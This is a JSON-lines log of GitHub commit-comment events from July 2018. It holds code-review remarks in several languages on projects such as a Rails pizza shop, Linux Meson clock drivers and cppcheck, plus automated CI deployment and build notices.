{"id":"7975022267","type":"CommitCommentEvent","actor":{"login":"hey999999999"},"repo":{"name":"hey999999999/socketiosample"},"payload":{"comment":{"id":29731149,"position":null,"line":null,"path":null,"commit_id":"5d4d47d0ff190fecaadd1de1f81970f6096efddc","created_at":"2018-07-17T08:03:32Z","updated_at":"2018-07-17T08:03:32Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/81381c3b-a7c5-42d5-b5ba-ed63984ec8b6?env_id=ibm%3Ayp%3Aus-south \"nodedetoolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/c5766795-0b60-4c2a-9200-b500fcef6599?env_id=ibm%3Ayp%3Aus-south \"nodedetoolchain\") deployed [socketiosample](https://github.com/hey999999999/socketiosample/releases/tag/deploy-ibm-yp-us-south-jiec_taira-space_south-20180717-080331 \"deploy-ibm-yp-us-south-jiec_taira-space_south-20180717-080331\") to [space_south](https://console.bluemix.net/apps/3aec1428-59d8-47dd-9cb0-48f60f64aa03?env_id=ibm:yp:us-south \"ibm:yp:us-south:jiec_taira:space_south\"), including this commit"}},"created_at":"2018-07-17T08:03:32Z"}
{"id":"7975023447","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29731153,"position":null,"line":null,"path":null,"commit_id":"e644dc51b54da339aab4206a15a24696e9df0713","created_at":"2018-07-17T08:03:47Z","updated_at":"2018-07-17T08:03:47Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 38](https://teamcity.otenv.com/viewLog.html?buildId=8948888&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Step 2/2) Build time: 00:36:22"}},"created_at":"2018-07-17T08:03:47Z"}
{"id":"7975026847","type":"CommitCommentEvent","actor":{"login":"Euseong"},"repo":{"name":"Euseong/R-project"},"payload":{"comment":{"id":29731159,"position":10,"line":84,"path":"data integration.R","commit_id":"751a6aa2d654ce646bb3cbe35c9d5d7d68ccc6cd","created_at":"2018-07-17T08:04:30Z","updated_at":"2018-07-17T08:04:30Z","author_association":"OWNER","body":"rawdata에서 '자치구'. '동'의 자료형을 chr로 만듦\r\n1인가구, 2인이상.가구, 1인가구.비율 컬럼명에 X 붙은것 제거"}},"created_at":"2018-07-17T08:04:30Z"}
{"id":"7975035363","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/pizzashop"},"payload":{"comment":{"id":29731168,"position":1,"line":1,"path":"README.md","commit_id":"d4178afe80b034c303ad673371896bb1c9b3095a","created_at":"2018-07-17T08:06:18Z","updated_at":"2018-07-17T08:06:18Z","author_association":"NONE","body":"try to create helpful  README files, at least specify how to run the project"}},"created_at":"2018-07-17T08:06:18Z"}
{"id":"7975037270","type":"CommitCommentEvent","actor":{"login":"ttakuru88"},"repo":{"name":"hasehiro25/kuso_blog_project"},"payload":{"comment":{"id":29731171,"position":null,"line":null,"path":null,"commit_id":"c3df9b7ff2e366a73bbc7006ece26a126537ffad","created_at":"2018-07-17T08:06:38Z","updated_at":"2018-07-17T08:06:38Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-17T08:06:38Z"}
{"id":"7975040741","type":"CommitCommentEvent","actor":{"login":"rocktar8"},"repo":{"name":"polaris-/dwc_network_server_emulator"},"payload":{"comment":{"id":29731176,"position":null,"line":null,"path":null,"commit_id":"d3eed4c43006289ef7466a363e7be91cddbbc593","created_at":"2018-07-17T08:07:20Z","updated_at":"2018-07-17T08:07:20Z","author_association":"NONE","body":"Hellow Polaris.\r\nI don´t know how write you for private chat, I have a question about the Pokemon Dream World.\r\nHow it´s the project going?"}},"created_at":"2018-07-17T08:07:20Z"}
{"id":"7975042405","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/pizzashop"},"payload":{"comment":{"id":29731177,"position":19,"line":19,"path":"app/assets/javascripts/application.js","commit_id":"d4178afe80b034c303ad673371896bb1c9b3095a","created_at":"2018-07-17T08:07:39Z","updated_at":"2018-07-17T08:07:39Z","author_association":"NONE","body":"do not include JS code to this file, require it from some separate js\r\n"}},"created_at":"2018-07-17T08:07:39Z"}
{"id":"7975048800","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/pizzashop"},"payload":{"comment":{"id":29731185,"position":40,"line":40,"path":"app/assets/javascripts/application.js","commit_id":"d4178afe80b034c303ad673371896bb1c9b3095a","created_at":"2018-07-17T08:08:59Z","updated_at":"2018-07-17T08:08:59Z","author_association":"NONE","body":"always wrap jquery code into\r\n$(function() {\r\n    console.log( \"ready!\" );\r\n});\r\n\r\nhttp://learn.jquery.com/using-jquery-core/document-ready/"}},"created_at":"2018-07-17T08:08:59Z"}
{"id":"7975051651","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/pizzashop"},"payload":{"comment":{"id":29731187,"position":1,"line":1,"path":"app/assets/javascripts/pages.coffee","commit_id":"d4178afe80b034c303ad673371896bb1c9b3095a","created_at":"2018-07-17T08:09:34Z","updated_at":"2018-07-17T08:09:34Z","author_association":"NONE","body":"delete useless/empty files"}},"created_at":"2018-07-17T08:09:34Z"}
{"id":"7975052241","type":"CommitCommentEvent","actor":{"login":"RehanSaeed"},"repo":{"name":"Dotnet-Boxed/Templates"},"payload":{"comment":{"id":29731189,"position":null,"line":null,"path":null,"commit_id":"f3abef2c9e1b8c5c3c7ec4e2666bf29f23f0e487","created_at":"2018-07-17T08:09:42Z","updated_at":"2018-07-17T08:09:42Z","author_association":"MEMBER","body":"The HTTP HEAD method does the same thing as GET but does not send a response body. There may be times when this is useful, such as to test if a resource exists (200) or not (404). It's one extra line, it's easy to add wherever you add `[HttpGet]`."}},"created_at":"2018-07-17T08:09:42Z"}
{"id":"7975053333","type":"CommitCommentEvent","actor":{"login":"romanyx"},"repo":{"name":"Dipress/bgwebmon-go"},"payload":{"comment":{"id":29731195,"position":12,"line":18,"path":"internal/server/user/user.go","commit_id":"8673fffdf2acea8a315a4886c23bd965189aa004","created_at":"2018-07-17T08:09:55Z","updated_at":"2018-07-17T08:09:55Z","author_association":"NONE","body":"he is"}},"created_at":"2018-07-17T08:09:55Z"}
{"id":"7975059010","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/pizzashop"},"payload":{"comment":{"id":29731207,"position":9,"line":9,"path":"app/controllers/orders_controller.rb","commit_id":"d4178afe80b034c303ad673371896bb1c9b3095a","created_at":"2018-07-17T08:11:01Z","updated_at":"2018-07-17T08:11:01Z","author_association":"NONE","body":"you have to show some flash message, as well handle situation when order is not created"}},"created_at":"2018-07-17T08:11:01Z"}
{"id":"7975059071","type":"CommitCommentEvent","actor":{"login":"GalRogozinski"},"repo":{"name":"iotadevelopment/iri"},"payload":{"comment":{"id":29731208,"position":64,"line":442,"path":"src/main/java/com/iota/iri/controllers/TransactionViewModel.java","commit_id":"809ed82f57c11c4135478034014a85b6f804b55d","created_at":"2018-07-17T08:11:02Z","updated_at":"2018-07-17T08:11:02Z","author_association":"NONE","body":"You can use to `trunk.getAddressHash()` If I am not mistaken.\r\nThen compare it to `Configuration.MAINNET_COORDINATOR_ADDRESS`\r\n\r\nThis way you save db queries. You also won't use Try-Catch for logic flow."}},"created_at":"2018-07-17T08:11:02Z"}
{"id":"7975060085","type":"CommitCommentEvent","actor":{"login":"rocktar8"},"repo":{"name":"polaris-/dwc_network_server_emulator"},"payload":{"comment":{"id":29731211,"position":null,"line":null,"path":null,"commit_id":"d3eed4c43006289ef7466a363e7be91cddbbc593","created_at":"2018-07-17T08:11:14Z","updated_at":"2018-07-17T08:11:14Z","author_association":"NONE","body":"https://github.com/mm201/pkmn-classic-framework/issues/8\r\n"}},"created_at":"2018-07-17T08:11:14Z"}
{"id":"7975061665","type":"CommitCommentEvent","actor":{"login":"nyuhuhuu"},"repo":{"name":"LinaLtu/udacity-arcade-game"},"payload":{"comment":{"id":29731213,"position":13,"line":53,"path":"js/app.js","commit_id":"08da2f6512e59ad775bd81197e52332300aa97fc","created_at":"2018-07-17T08:11:34Z","updated_at":"2018-07-17T08:11:34Z","author_association":"NONE","body":"There's a pattern to return as soon as possible. It can improve the readability of your code.\r\n\r\n```javascript\r\ncase \"left\":\r\n  if (this.x - movement < 0) {\r\n    return;\r\n  }\r\n  this.x -= movement;\r\n  break;\r\n```\r\n\r\nhttps://softwareengineering.stackexchange.com/questions/18454/should-i-return-from-a-function-early-or-use-an-if-statement#18459"}},"created_at":"2018-07-17T08:11:34Z"}
{"id":"7975063907","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731218,"position":27,"line":27,"path":"drivers/clk/meson/vid-pll-div.c","commit_id":"06dd3ddc4307026d3e52342d6898da0977dbbc51","created_at":"2018-07-17T08:12:03Z","updated_at":"2018-07-17T08:12:03Z","author_association":"NONE","body":"Si tu pouvais transformer ca en 3 'parm' (ou plus) comme dans les autres drivers specific a AML, ca serait top.\r\n"}},"created_at":"2018-07-17T08:12:03Z"}
{"id":"7975065612","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/pizzashop"},"payload":{"comment":{"id":29731223,"position":3,"line":3,"path":"app/controllers/pages_controller.rb","commit_id":"d4178afe80b034c303ad673371896bb1c9b3095a","created_at":"2018-07-17T08:12:22Z","updated_at":"2018-07-17T08:12:22Z","author_association":"NONE","body":"you can use default scope in Order model for ordering\r\ntry to add will_paginate gem and avoid Order.all. Just imagine you have 1M orders, what happens?"}},"created_at":"2018-07-17T08:12:22Z"}
{"id":"7975068681","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731232,"position":59,"line":59,"path":"drivers/clk/meson/vid-pll-div.c","commit_id":"06dd3ddc4307026d3e52342d6898da0977dbbc51","created_at":"2018-07-17T08:12:58Z","updated_at":"2018-07-17T08:12:58Z","author_association":"NONE","body":"Si je comprends bien, c'est divider fractionnaire mais avec des parametres super \r\nbizarre "}},"created_at":"2018-07-17T08:12:58Z"}
{"id":"7975068992","type":"CommitCommentEvent","actor":{"login":"versat"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":29731233,"position":null,"line":null,"path":null,"commit_id":"e46c499f5a6c552672ce246e0be8f14c9febcc51","created_at":"2018-07-17T08:13:02Z","updated_at":"2018-07-17T08:13:02Z","author_association":"COLLABORATOR","body":"Locally this command line works for me analyzing all dumps in gui/ and lib/ but not in the subdirectories (as it is done now):\r\n```\r\nfind . -name \"*.dump\" | grep -P \"\\.\\/(lib|gui)\\/[^\\/]*\\.cpp\\.dump\" | xargs -n 1 -P 4 python addons/naming.py --private-member-variable='m[A-Z].*'\r\n```\r\n"}},"created_at":"2018-07-17T08:13:02Z"}
{"id":"7975074629","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/pizzashop"},"payload":{"comment":{"id":29731248,"position":10,"line":10,"path":"app/views/orders/new.html.erb","commit_id":"d4178afe80b034c303ad673371896bb1c9b3095a","created_at":"2018-07-17T08:14:07Z","updated_at":"2018-07-17T08:14:07Z","author_association":"NONE","body":"you have to add spaces before and after '<%= ' ' %>'"}},"created_at":"2018-07-17T08:14:07Z"}
{"id":"7975075339","type":"CommitCommentEvent","actor":{"login":"GalRogozinski"},"repo":{"name":"iotadevelopment/iri"},"payload":{"comment":{"id":29731249,"position":78,"line":456,"path":"src/main/java/com/iota/iri/controllers/TransactionViewModel.java","commit_id":"809ed82f57c11c4135478034014a85b6f804b55d","created_at":"2018-07-17T08:14:14Z","updated_at":"2018-07-17T08:14:14Z","author_association":"NONE","body":"I think `max` is better from the perspective of the side-tangle issue.\r\nUsing `min` can cause an edge scenario where a tx that references a new milestone will be considered old.\r\nThere is also an issue with `max`. I will write about it soon in IF channels."}},"created_at":"2018-07-17T08:14:14Z"}
{"id":"7975076481","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731251,"position":30,"line":185,"path":"drivers/clk/meson/gxbb.h","commit_id":"e9f0826602fd6bc6909b9067fca9cb1ed95a48e2","created_at":"2018-07-17T08:14:29Z","updated_at":"2018-07-17T08:14:29Z","author_association":"NONE","body":"En fait, il faudrait mettre cette partie avec le patch suivant"}},"created_at":"2018-07-17T08:14:29Z"}
{"id":"7975078499","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/pizzashop"},"payload":{"comment":{"id":29731256,"position":16,"line":16,"path":"app/views/orders/new.html.erb","commit_id":"d4178afe80b034c303ad673371896bb1c9b3095a","created_at":"2018-07-17T08:14:53Z","updated_at":"2018-07-17T08:14:53Z","author_association":"NONE","body":"id will be set automatically"}},"created_at":"2018-07-17T08:14:53Z"}
{"id":"7975082281","type":"CommitCommentEvent","actor":{"login":"yangqingfly"},"repo":{"name":"toxmc/swoole-chm"},"payload":{"comment":{"id":29731264,"position":null,"line":null,"path":null,"commit_id":"d0d96668ceac69ced8b70c20b1e78db6f9909fe8","created_at":"2018-07-17T08:15:38Z","updated_at":"2018-07-17T08:15:38Z","author_association":"NONE","body":"aaaaaaaa"}},"created_at":"2018-07-17T08:15:38Z"}
{"id":"7975084100","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731270,"position":194,"line":1723,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T08:16:01Z","updated_at":"2018-07-17T08:16:01Z","author_association":"NONE","body":"Ca doit etre d'un ancien patch je suppose"}},"created_at":"2018-07-17T08:16:01Z"}
{"id":"7975087243","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/pizzashop"},"payload":{"comment":{"id":29731275,"position":21,"line":21,"path":"config/database.yml","commit_id":"d4178afe80b034c303ad673371896bb1c9b3095a","created_at":"2018-07-17T08:16:38Z","updated_at":"2018-07-17T08:16:38Z","author_association":"NONE","body":"avoid any credentials in source code, take a look @ https://github.com/bkeepers/dotenv\r\nadd it's file to gitignore"}},"created_at":"2018-07-17T08:16:38Z"}
{"id":"7975087317","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731276,"position":197,"line":1726,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T08:16:39Z","updated_at":"2018-07-17T08:16:39Z","author_association":"NONE","body":"Du coup, on a vraiment besoin ?"}},"created_at":"2018-07-17T08:16:39Z"}
{"id":"7975088844","type":"CommitCommentEvent","actor":{"login":"nyuhuhuu"},"repo":{"name":"LinaLtu/udacity-arcade-game"},"payload":{"comment":{"id":29731278,"position":5,"line":4,"path":"js/app.js","commit_id":"9397f2aab1e648467ce43f46db5363b16f5b0e68","created_at":"2018-07-17T08:16:57Z","updated_at":"2018-07-17T08:16:57Z","author_association":"NONE","body":"🎈!"}},"created_at":"2018-07-17T08:16:57Z"}
{"id":"7975088896","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29731279,"position":null,"line":null,"path":null,"commit_id":"e644dc51b54da339aab4206a15a24696e9df0713","created_at":"2018-07-17T08:16:57Z","updated_at":"2018-07-17T08:16:57Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 39](https://teamcity.otenv.com/viewLog.html?buildId=8949178&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **UNKNOWN**\nSummary: Canceled (Step 2/2) Build time: 00:13:11"}},"created_at":"2018-07-17T08:16:57Z"}
{"id":"7975090889","type":"CommitCommentEvent","actor":{"login":"kabylixx"},"repo":{"name":"Evaneos/burrow-bundle"},"payload":{"comment":{"id":29731280,"position":12,"line":52,"path":"src/DependencyInjection/Configuration.php","commit_id":"a6eae780906328a72258c750d9e923c1f9b01e3e","created_at":"2018-07-17T08:17:22Z","updated_at":"2018-07-17T08:17:22Z","author_association":"NONE","body":"`serializing_strategy` pour garder le même format que pour `requeue_on_failure`, `evaneos_burrow` ... non ?"}},"created_at":"2018-07-17T08:17:22Z"}
{"id":"7975092361","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731285,"position":256,"line":1785,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T08:17:40Z","updated_at":"2018-07-17T08:17:40Z","author_association":"NONE","body":"idem ?"}},"created_at":"2018-07-17T08:17:40Z"}
{"id":"7975092454","type":"CommitCommentEvent","actor":{"login":"Dipress"},"repo":{"name":"Dipress/bgwebmon-go"},"payload":{"comment":{"id":29731286,"position":12,"line":18,"path":"internal/server/user/user.go","commit_id":"8673fffdf2acea8a315a4886c23bd965189aa004","created_at":"2018-07-17T08:17:41Z","updated_at":"2018-07-17T08:17:41Z","author_association":"OWNER","body":"Не понял. "}},"created_at":"2018-07-17T08:17:41Z"}
{"id":"7975095172","type":"CommitCommentEvent","actor":{"login":"jackbindin"},"repo":{"name":"jackbindin/SmartGrid"},"payload":{"comment":{"id":29731292,"position":null,"line":null,"path":null,"commit_id":"166fd86114e0f53a61bb0dbbf283109c02bc82aa","created_at":"2018-07-17T08:18:15Z","updated_at":"2018-07-17T08:18:15Z","author_association":"OWNER","body":"merging"}},"created_at":"2018-07-17T08:18:15Z"}
{"id":"7975096506","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/pizzashop"},"payload":{"comment":{"id":29731294,"position":1,"line":1,"path":"test/test_helper.rb","commit_id":"d4178afe80b034c303ad673371896bb1c9b3095a","created_at":"2018-07-17T08:18:30Z","updated_at":"2018-07-17T08:18:30Z","author_association":"NONE","body":"try to create some tests"}},"created_at":"2018-07-17T08:18:30Z"}
{"id":"7975098949","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731304,"position":471,"line":2000,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T08:18:57Z","updated_at":"2018-07-17T08:18:57Z","author_association":"NONE","body":"Comme tu as mis tout les parent possible dans ta table, tu peux virer ce commentaire"}},"created_at":"2018-07-17T08:18:57Z"}
{"id":"7975101468","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731311,"position":492,"line":2021,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T08:19:28Z","updated_at":"2018-07-17T08:19:28Z","author_association":"NONE","body":"idem"}},"created_at":"2018-07-17T08:19:28Z"}
{"id":"7975102055","type":"CommitCommentEvent","actor":{"login":"romanyx"},"repo":{"name":"Dipress/bgwebmon-go"},"payload":{"comment":{"id":29731313,"position":12,"line":18,"path":"internal/server/user/user.go","commit_id":"8673fffdf2acea8a315a4886c23bd965189aa004","created_at":"2018-07-17T08:19:35Z","updated_at":"2018-07-17T08:19:35Z","author_association":"NONE","body":"login or password is invalid"}},"created_at":"2018-07-17T08:19:35Z"}
{"id":"7975102354","type":"CommitCommentEvent","actor":{"login":"nyuhuhuu"},"repo":{"name":"LinaLtu/udacity-arcade-game"},"payload":{"comment":{"id":29731314,"position":null,"line":null,"path":null,"commit_id":"3b678af8dc84e61b578ae3c902ea326a18cc011b","created_at":"2018-07-17T08:19:38Z","updated_at":"2018-07-17T08:19:38Z","author_association":"NONE","body":"Be careful when you open an existing provided source code. It was written with a different coding style in mind, and your editor reformatted it. If that's fine for you, I'd recommend to commit it as a separate change. It's difficult to see if there was an actual change in the code, or it's only whitespace changes. "}},"created_at":"2018-07-17T08:19:38Z"}
{"id":"7975102807","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731316,"position":513,"line":2042,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T08:19:44Z","updated_at":"2018-07-17T08:19:44Z","author_association":"NONE","body":"idem"}},"created_at":"2018-07-17T08:19:44Z"}
{"id":"7975103232","type":"CommitCommentEvent","actor":{"login":"Jagailo"},"repo":{"name":"Jagailo/YetAnotherKeyDisplayer"},"payload":{"comment":{"id":29731318,"position":12,"line":19,"path":"RTSSCustomOSD/AssemblyInfo.cpp","commit_id":"cd53f204ecdf6c478ba6d00a994806be8bd7a1a1","created_at":"2018-07-17T08:19:49Z","updated_at":"2018-07-17T08:19:49Z","author_association":"OWNER","body":"But why? I use [this custom OSD](https://github.com/spencerhakim/RTSSSharedMemoryNET) for RTSS. \r\nAccording to the license of LGPL-3.0, on which this library is distributed, I have the right to use this library even for commercial purposes, but copyrights must be specified. I didn't remove the copyright in the code and added a link in the README.md to the author's repository."}},"created_at":"2018-07-17T08:19:49Z"}
{"id":"7975104428","type":"CommitCommentEvent","actor":{"login":"adamstony3333"},"repo":{"name":"opendesktop/ocs-store"},"payload":{"comment":{"id":29731319,"position":null,"line":null,"path":null,"commit_id":"306163d226a2b9dbb684006f0fce13144bda3903","created_at":"2018-07-17T08:20:03Z","updated_at":"2018-07-17T08:20:03Z","author_association":"NONE","body":"https://github.com/opendesktop/ocs-store/commit/306163d226a2b9dbb684006f0fce13144bda3903#diff-c77919c13a07f2374211ca693bdc6aee"}},"created_at":"2018-07-17T08:20:03Z"}
{"id":"7975105414","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731321,"position":4,"line":1400,"path":"dkvideoplayer/src/main/java/com/dabkick/dkvideoplayer/livesession/stage/VideoManager.java","commit_id":"df42ac8db78bc3b4cd45f524921f8661a2fbff3e","created_at":"2018-07-17T08:20:15Z","updated_at":"2018-07-17T08:20:15Z","author_association":"NONE","body":"Seeking locally should not take into account the delta because where you seek to is where you should wait in auto_pause state"}},"created_at":"2018-07-17T08:20:15Z"}
{"id":"7975107638","type":"CommitCommentEvent","actor":{"login":"xuezhiji"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29731324,"position":null,"line":null,"path":null,"commit_id":"00d32612a38898781bce791a4a845e60a7fbdb4e","created_at":"2018-07-17T08:20:40Z","updated_at":"2018-07-17T08:20:40Z","author_association":"NONE","body":"foo = foo version 10"}},"created_at":"2018-07-17T08:20:40Z"}
{"id":"7975108303","type":"CommitCommentEvent","actor":{"login":"mmg-vp"},"repo":{"name":"Voltc/blog"},"payload":{"comment":{"id":29731325,"position":21,"line":21,"path":"app/controllers/articles_controller.rb","commit_id":"564f126da9149aa9b4f24739bee0b1c57c68c376","created_at":"2018-07-17T08:20:48Z","updated_at":"2018-07-17T08:20:48Z","author_association":"NONE","body":"try to follow DRY principle, move out @article = Article.find(params[:id]) to set_articte method, call it from berore action"}},"created_at":"2018-07-17T08:20:48Z"}
{"id":"7975109613","type":"CommitCommentEvent","actor":{"login":"ben0501"},"repo":{"name":"ben0501/super-fortnight"},"payload":{"comment":{"id":29731327,"position":null,"line":null,"path":null,"commit_id":"41880221e9e6e70871985e0a448ca4445c3cf331","created_at":"2018-07-17T08:21:03Z","updated_at":"2018-07-17T08:21:03Z","author_association":"OWNER","body":"Ach und das ist ein Kommentar dazu"}},"created_at":"2018-07-17T08:21:03Z"}
{"id":"7975109819","type":"CommitCommentEvent","actor":{"login":"xuezhiji"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29731329,"position":null,"line":null,"path":null,"commit_id":"00d32612a38898781bce791a4a845e60a7fbdb4e","created_at":"2018-07-17T08:21:06Z","updated_at":"2018-07-17T08:21:06Z","author_association":"NONE","body":"-foo = foo version 4"}},"created_at":"2018-07-17T08:21:06Z"}
{"id":"7975110501","type":"CommitCommentEvent","actor":{"login":"Quist"},"repo":{"name":"navikt/modiapersonoversikt"},"payload":{"comment":{"id":29731331,"position":null,"line":null,"path":null,"commit_id":"67759932b864ce42ef32599f730dc66adb69c362","created_at":"2018-07-17T08:21:14Z","updated_at":"2018-07-17T08:21:14Z","author_association":"COLLABORATOR","body":"![](https://media.giphy.com/media/6fScAIQR0P0xW/giphy.gif)"}},"created_at":"2018-07-17T08:21:14Z"}
{"id":"7975111338","type":"CommitCommentEvent","actor":{"login":"pjkgyang"},"repo":{"name":"pjkgyang/Assistant-mobile"},"payload":{"comment":{"id":29731332,"position":null,"line":null,"path":null,"commit_id":"131499a4519425d15c87a229c9467399b7258978","created_at":"2018-07-17T08:21:25Z","updated_at":"2018-07-17T08:21:25Z","author_association":"OWNER","body":"commit"}},"created_at":"2018-07-17T08:21:25Z"}
{"id":"7975111839","type":"CommitCommentEvent","actor":{"login":"SingHo2016"},"repo":{"name":"DabKickDeveloper/DKPlayer"},"payload":{"comment":{"id":29731333,"position":null,"line":null,"path":null,"commit_id":"782558312b2b0413ccc90d54621dfebf7f25cd11","created_at":"2018-07-17T08:21:31Z","updated_at":"2018-07-17T08:21:31Z","author_association":"NONE","body":"Changes in this method reverted in next commit"}},"created_at":"2018-07-17T08:21:31Z"}
{"id":"7975114631","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731340,"position":526,"line":2055,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T08:22:05Z","updated_at":"2018-07-17T08:22:05Z","author_association":"NONE","body":"Si c'est la meme chose que pour cts_parent_names, peut etre qu'on choisir un nom plus parlant (genre vdiv_vclk_names and vdiv_vclk_indexes) et la declarer une seule fois ?"}},"created_at":"2018-07-17T08:22:05Z"}
{"id":"7975117748","type":"CommitCommentEvent","actor":{"login":"nyuhuhuu"},"repo":{"name":"LinaLtu/udacity-arcade-game"},"payload":{"comment":{"id":29731344,"position":12,"line":88,"path":"js/engine.js","commit_id":"453977e6b59b45711dcb9b6d49acc605a45398a1","created_at":"2018-07-17T08:22:42Z","updated_at":"2018-07-17T08:22:42Z","author_association":"NONE","body":"I like that you use comments in your code. It helps me understand what certain piece of code does. Often when you provide a comment, there's also a way to make it part of the code. What do you think about something like\r\n\r\n```\r\n  if (player.reachedWater()) {\r\n```"}},"created_at":"2018-07-17T08:22:42Z"}
{"id":"7975118037","type":"CommitCommentEvent","actor":{"login":"Jagailo"},"repo":{"name":"Jagailo/YetAnotherKeyDisplayer"},"payload":{"comment":{"id":29731346,"position":12,"line":19,"path":"RTSSCustomOSD/AssemblyInfo.cpp","commit_id":"cd53f204ecdf6c478ba6d00a994806be8bd7a1a1","created_at":"2018-07-17T08:22:46Z","updated_at":"2018-07-17T08:22:46Z","author_association":"OWNER","body":"Perhaps you were looking for this:\r\nhttps://github.com/Jagailo/YetAnotherKeyDisplayer/blob/master/YAKD/Properties/AssemblyInfo.cs"}},"created_at":"2018-07-17T08:22:46Z"}
{"id":"7975118176","type":"CommitCommentEvent","actor":{"login":"LIULi-VVET"},"repo":{"name":"grpc/grpc-java"},"payload":{"comment":{"id":29731347,"position":null,"line":null,"path":null,"commit_id":"146b6006b3cc003f68100d10da4ffce8225cc31d","created_at":"2018-07-17T08:22:47Z","updated_at":"2018-07-17T08:22:47Z","author_association":"NONE","body":"I compared the java code generated with proto\r\n\r\n  @io.grpc.stub.annotations.RpcMethod(\r\n          fullMethodName = \"\",      requestType =RequestSyncDevicesRequest.class,     \r\n responseType = RequestSyncDevicesResponse.class,      methodType = .MethodType.UNARY)\r\n"}},"created_at":"2018-07-17T08:22:47Z"}
{"id":"7975118361","type":"CommitCommentEvent","actor":{"login":"saghul"},"repo":{"name":"jitsi/jitsi-meet"},"payload":{"comment":{"id":29731348,"position":null,"line":null,"path":null,"commit_id":"b9f28a1beb2e0c8e4298d5dcc8b695a57d7eabeb","created_at":"2018-07-17T08:22:50Z","updated_at":"2018-07-17T08:22:50Z","author_association":"MEMBER","body":"Why is this after element not implemented on mobile?"}},"created_at":"2018-07-17T08:22:50Z"}
{"id":"7975119135","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29731349,"position":null,"line":null,"path":null,"commit_id":"5085009bb7f33875a1e135a0bbbaedc7ea41f467","created_at":"2018-07-17T08:22:59Z","updated_at":"2018-07-17T08:22:59Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Como o Laravel lida com Cookies ?](https://trello.com/c/QNvhOau7/202-como-o-laravel-lida-com-cookies)"}},"created_at":"2018-07-17T08:22:59Z"}
{"id":"7975119411","type":"CommitCommentEvent","actor":{"login":"jeromebrunet"},"repo":{"name":"superna9999/linux"},"payload":{"comment":{"id":29731351,"position":605,"line":2134,"path":"drivers/clk/meson/gxbb.c","commit_id":"91019aa6ce723b3374aa996b834dde0c83e0d8f7","created_at":"2018-07-17T08:23:03Z","updated_at":"2018-07-17T08:23:03Z","author_association":"NONE","body":"On a vraiment besoin de tous ces CLK_IGNORE_UNUSED ou c'etait juste pour le debug ?"}},"created_at":"2018-07-17T08:23:03Z"}
